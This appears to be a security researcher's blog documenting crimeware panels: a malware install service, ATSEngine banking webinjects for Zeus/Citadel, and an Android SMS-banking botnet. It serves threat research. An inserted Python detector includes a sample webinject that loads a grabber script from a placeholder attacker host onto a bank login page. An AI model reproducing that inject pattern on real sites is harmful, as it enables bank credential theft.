Saturday, 20 December 2014

i/o

Wow, it's been a while since I've written anything new here...
So, to answer many questions: no, I'm not dead, and I will try to get a bit more active again next year.

I'm not writing this because of explanation requests or worried people (even if I've been solicited many times to write something) but more because I'm motivated to write again.
As I've said many times in reply to the recurring e-mails I receive and continue to receive (even after 7 months of inactivity!),
I've made a lot of changes in my life, and during this time I had better things to do than write in a blog.
Principally I had many personal issues to resolve.
It's also not the first time I repeat that I have a life and that I've always run this blog for fun and nonprofit, like my other services such as cybercrime-tracker.net,
and sooner or later I will get bored and take a break, although I've continued to update CCT so as not to leave people with nothing.


I also changed job and shifted to the energy sector.
I wanted a job that combines my passion for mechanics and electronics.
And now I'm winding turbo-alternators for nuclear/hydraulic power plants around the world and governmental organisations. (pretty cool, huh?)
I obviously can't tell you details due to confidentiality clauses, as it's critical, but building those huge machines/projects is quite awesome and the job is very meticulous.

I've also joined the administration of my local hackerspace, and now hold the position of treasurer.
I'm also doing various workshops, mostly electronics/borderline related, which take me time to prepare and organize.
In parallel I also experiment a lot myself; those who follow my youtube/twitter activity probably know what I mean: I received hydrofluoric acid 2 days ago.

2014 started a bit badly for me as I had a car crash on Christmas day and broke my clavicle. Anyway, globally it was a nice year, and outside of my blog I've met a lot of people like Horgh and many others.
Sadly I wasn't able to go to BotConf or DahuCon this year due to my job... so maybe next year!

I've also worked a bit with Hackerstrip and recently released some code for DarK-CodeZ #6, nothing fancy but it was fun to participate, thanks guys.
So that's all, see you in 2015 for throwing cobblestones and breaking bones!

Monday, 5 May 2014

Install service for Malware affiliates and individuals

This install service had been running for a long time, but the server recently died.
The people targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.

Login:

Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

Downloads:
(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

Updates:
(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There are some interesting people in this listing:
Severa (known for FakeAV, spam)
Malwox Affiliate (Mayachok.1)
Feodal cash Affiliate (Bitcoin malware)

And if you want to know about the EXE files loaded... all are malware (Zeus, SpyEye, Russian lockers, spam bots, Mayachok... etc.).
The x64 Zbot covered by Kaspersky also came from here.

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1363&start=50#p19625
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=648&start=40#p19621
The executables were rotated and refreshed constantly; from this system, around 400 samples could be pulled per day.

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

FTP:
Menu: users list, add, FTP, Stats.

For the FTP list, most of the accounts had a shell on them.

Structure:

From the source:
$useZorkaJob = 0; //without visiting ("без захода")
$useSputnikJob = 0;
$useRekloJob = 0;
$useSpoiskJob = 0;
$useBegunCheatJob = 0;
Begun is one of the biggest ad services in Russia.

Sunday, 4 May 2014

ATSEngine

ATSEngine injects can often be found inside Zeus configs; they make the webinjects more dynamic because most of the content is located remotely and can be updated much more easily, instead of sending a new config to all the bots.
That's the main difference between this and a standard web inject inside Zeus.
One just allows you to make a static change in the page, while the other gives you many more options, for example customized webinjects, pop-ups, online requests for tokens, etc...
ATSEngine also has a jabber alert feature: it lets the fraudster know when the victim is logged into his bank account, so it would be a good time to backconnect to him (with the VNC feature of Zeus) and do the transaction.
Most ATSEngine panels are also hosted on SSL because banks use SSL.
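An added example (not from the post, and not ATSEngine or Zeus code): a small parser for the public Zeus/Citadel webinject config format (set_url / data_before / data_inject / data_after / data_end blocks) that flags injects whose injected HTML loads a script from a host other than the targeted site, which is the remote-content pattern described above. The config and all hostnames below are constructed placeholders for the demonstration.

```python
import re
from urllib.parse import urlparse
# Constructed sample in the Zeus/Citadel webinject config format; hostnames are placeholders.
SAMPLE_CONFIG = """\
set_url https://online.bank-example.test/login* GP
data_before
</head>
data_end
data_inject
<script src="https://ats-panel.example.test/js/figrabber.js"></script>
data_end
data_after
data_end

set_url https://online.bank-example.test/balance* G
data_before
<div id="balance">
data_end
data_inject
<span>0.00</span>
data_end
data_after
data_end
"""
SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.IGNORECASE)

def parse_webinjects(text):
    """Parse set_url / data_before / data_inject / data_after blocks into dicts."""
    injects, current, section, buf = [], None, None, []
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("set_url"):
            current = {"url": s.split()[1], "before": "", "inject": "", "after": ""}
            injects.append(current)
        elif s in ("data_before", "data_inject", "data_after"):
            section, buf = s[5:], []          # "before" / "inject" / "after"
        elif s == "data_end" and current is not None and section:
            current[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return injects

def remote_script_injects(injects):
    """(target_url, script_url) pairs where the injected HTML pulls a script from another host."""
    hits = []
    for inj in injects:
        target_host = urlparse(inj["url"]).hostname
        for src in SCRIPT_SRC.findall(inj["inject"]):
            if urlparse(src).hostname not in (None, target_host):
                hits.append((inj["url"], src))
    return hits
```

Run over a config extracted from a sample, the flagged script URLs are the panel hosts worth blocking or pivoting on.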

ATSEngine on a ZeusVM config.

ATSEngine on a Citadel config.
Example of figrabber.js from an ATSEngine panel.

Some guys also do business with this type of web inject, for example:
He's offering a service for writing injects.
The title says "Auto-uploads and Injects from professionals for professionals".
The rest of the text explains how the service works; it's more a terms-and-conditions post than a technical description of the product: about moneyback, privacy, guarantees and other stuff.
They don't write mobile botnets, trojan horses, traffic direction systems or other malware except injects, and they don't guarantee bypass of protection (like Rapport).
yummba is known anyway for writing injects for ATSEngine.

Let's have a look at a C&C now..


Accounts:

Reports:

Options main:

Options Jabber:

Another panel, on SSL:

Another panel, on SSL:

Another panel, still on SSL:

Details:

Additional fields rules:

Additional fields rules (texts):

Edit rule:

Edit text:

VBV/MCSC rules:

Add a rule:

Options:

Options (CC Checker):

Files, dumped from another panel, targeting La Banque Postale (a French bank):

Sunday, 27 April 2014

Android.Trojan.Rubobi.A (SmsPiratBot)

Another Android botnet dumped recently.
This malware can send and intercept SMS from the bots.
Like most Android botnets, it is used mainly to target mobile banking like Sberbank (www.sberbank.ru, the biggest bank in Russia).
In Russia, you can transfer money from one card to another card through mobile SMS.
This botnet is sold for 120$.

Fake App:
MD5: 2ea5e73653d1454c04ecd48202dcc391

Login:

System Stats:

Countries:

Operators:

Task Stats:

Task Editor:

Blacklist:

Stored SMS:

Another panel:

Structure: